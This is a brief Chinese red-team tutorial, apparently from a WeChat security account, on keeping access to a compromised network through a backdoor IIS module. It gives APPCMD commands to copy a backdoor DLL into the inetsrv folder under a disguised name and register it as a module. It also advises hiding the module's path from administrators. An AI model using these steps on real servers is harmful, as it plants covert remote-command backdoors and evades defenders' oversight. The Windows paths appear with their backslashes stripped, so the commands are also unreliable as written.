IIS - Module后门
把后门dll放到 C:WindowsSystem32inetsrv,增加隐蔽性(可以自己改名)
copy IIS-Backdoor.dll %windir%System32inetsrvIIS-Backdoor.dll
安装后门
C:Windowssystem32inetsrvAPPCMD.EXE install module /name:0-sec /image:"%windir%System32inetsrvIIS-Backdoor.dll" /add:true
删除后门
C:Windowssystem32inetsrvAPPCMD.EXE uninstall module 0-sec
查看已安装模块
C:Windowssystem32inetsrvAPPCMD.EXE list module
运行inetmgr.exe,进入IIS管理器,选择Modules
再通过主控端进行命令执行操作
流量分析
再次访问模块,发现刚刚新建的模块直接显示的就是绝对路径泄漏的太明显了。我们重新编辑修改一下
最后再来个有奖竞答,底下截图的模块里,哪一个才是后门?
第一个留言回答正确的奖励文库邀请码一枚,如果有账号则加20信誉值积分。
本文始发于微信公众号(零组攻防实验室):【红蓝攻防】红队中的内网权限维持(2)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论